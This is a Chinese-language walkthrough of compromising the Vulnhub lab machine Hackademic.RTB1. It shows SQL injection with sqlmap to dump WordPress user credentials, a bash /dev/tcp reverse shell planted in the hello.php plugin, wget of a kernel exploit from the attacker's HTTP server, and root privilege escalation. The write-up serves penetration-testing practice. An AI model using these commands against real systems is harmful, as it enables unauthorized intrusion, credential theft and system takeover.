• Vulnhub系列靶机-Hackadmeic.RTB1


    Vulnhub系列靶机-Hackadmeic.RTB1

    1. 信息收集

    1.1 主机扫描

    arp-scan -l
    
    • 1

    image-20230910123002137

    1.2 端口扫描

    nmap -A -p- 192.168.188.184
    
    • 1

    image-20230910123759565

    扫描到了22端口和80端口,但是22端口的关闭的。

    访问Web页面

    image-20230910123616182

    使用浏览器插件Wappalyzer扫描网站

    image-20230910123707794

    看到WordPress,数据库是MySQL,语言是PHP。

    根据首页中显示的内容,点击target

    image-20230910124238518

    页面提示告诉我们要读取root目录下的Key.txt文件。

    image-20230910124307870

    1.3 目录爆破

    爆破/Hackademic_RTB1/网页目录

    dirsearch -u http://192.168.188.184/Hackademic_RTB1/ -e * -i 200
    
    • 1

    image-20230910124525063

    观察发现有一个登录页面wp-login.php。

    2. 漏洞探测

    在点击页面中能点击的链接的时候,发现点击Uncategorized的时候,链接变成了

    http://192.168.188.184/Hackademic_RTB1/?cat=1
    
    • 1

    image-20230910124640071

    尝试是否存在SQL注入,在?cat=1后加上',发现有SQL语句的报错信息,可以判断有SQL注入漏洞。

    image-20230910124747474

    3. 漏洞利用

    使用SqlMap工具进行SQL注入。

    查看数据库

    sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" --dbs --batch 
    
    • 1

    image-20230910125123842

    查看数据库中有哪些表

    sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -tables --batch
    
    • 1

    image-20230910125306585

    查看wp_users表中字段

    sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns --batch
    
    • 1

    image-20230910125441481

    这里我们只关注user_login和user_pass字段。

    获取字段信息

    sqlmap -u "192.168.188.184/Hackademic_RTB1/?cat=1" -D "wordpress" -T "wp_users" -columns -C "user_login,user_pass" -dump --batch
    
    • 1

    image-20230910125648902

    这里直接使用第三个用户名和密码进行登录,其他账户通过查看都没有什么可靠的信息。

    image-20230910130217124

    发现在Plugins选项里有一个Plugin Editor编辑的地址。可以产生过添加反弹shell。

    3.1 反弹Shell

    system("bash -c 'sh -i &>/dev/tcp/192.168.188.157/8888 0>&1'");
    
    • 1

    image-20230910132406678

    kali中开启监听

    nc -lnvp 8888
    
    • 1

    image-20230910130517734

    提交之后,需要获取到上传的路径,才可以触发反弹shell。

    之前我们使用网页插件扫描网页的时候得知了网站使用的是WordPress,Wordpress上传的文件默认是存储在目录/wp-content/uploads中,Uploads文件夹中包括所有上传的图片,视频和附件。

    并且在爆破目录的时候发现有一个wp-content目录,尝试进行访问。(这里就存在目录遍历漏洞)

    image-20230910130850517

    刚才我们编辑的页面是在Plugins选项中的Plugin Editor下的hello.php。点击pluguns进行查看。

    image-20230910131104899

    点击hello.php后触发反弹shell

    image-20230910132519556

    4. 内核提权

    查看内核版本

    uname -a
    
    • 1

    image-20230910132621342

    搜索系统内核版本漏洞

    searchsploit 2.6.3 | grep "Local Privilege Escalation"
    
    • 1

    image-20230910132944564

    查看完整路径

    searchsploit -p linux/local/15285.c 
    
    • 1

    image-20230910133028252

    /usr/share/exploitdb/exploits/linux/local/15285.c
    
    • 1

    将15285.c文件拷贝到桌面上,然后在桌面上开启一个http服务

    python3 -m http.server 9999
    
    • 1

    image-20230910133601577

    然后切换到tmp目录,执行wget命令下载该工具

    wget http://192.168.188.157:9999/15285.c
    
    • 1

    image-20230910133819689

    然后赋予该文件可执行权限

    chmod 777 15285.c
    
    • 1

    image-20230910134031572

    将15285.c进行预处理,汇编,编译,并链接形成可执行文件exp。-o选项用来指定输出文件的文件名

    image-20230910134327352

    执行exp文件

    image-20230910134416263

    查看key.txt文件。

    image-20230910134545165

  • 相关阅读:
    2023年北京市安全员-C3证证模拟考试题库及北京市安全员-C3证理论考试试题
    linux配置java-web站点
    跨越编程界限:C++到JavaSE的平滑过渡
    c语言练习89:链表的使用
    ae快捷键
    SQL批量处理+JDBC操作大数据及工具类的封装
    补盲激光雷达「PK」4D成像雷达,车企会作何选择?
    【制作100个unity游戏之27】使用unity复刻经典游戏《植物大战僵尸》,制作属于自己的植物大战僵尸随机版和杂交版12(附带项目源码)
    HAproxy:负载均衡
    虾皮插件能做数据分析的-知虾数据分析插件Shopee大数据分析平台
  • 原文地址:https://blog.csdn.net/weixin_58783105/article/details/132949810